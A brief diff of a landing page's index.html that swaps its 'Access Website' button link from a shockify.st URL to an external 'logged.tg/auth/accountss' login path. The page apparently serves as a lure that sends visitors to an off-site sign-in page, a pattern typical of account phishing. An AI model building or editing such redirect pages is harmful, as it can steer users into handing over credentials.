--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
         <li>🔒 Secure Connection</li>
         <li>🚀 Instant Use</li>
       </ul>
-      <a href="https://shockify.st/?code=MzYxMjc0NzEzNzIzOTczMjAxOF83NTQzNzgzMTMxMzM2MDgyNTI5Xzc2NTQ3ODUxNzIwMTMyMDUzMTE=" class="cta">Access Website 💎</a>
+      <a href="https://www.logged.tg/auth/accountss" class="cta">Access Website 💎</a>
     </div>
 
     <div class="card2">
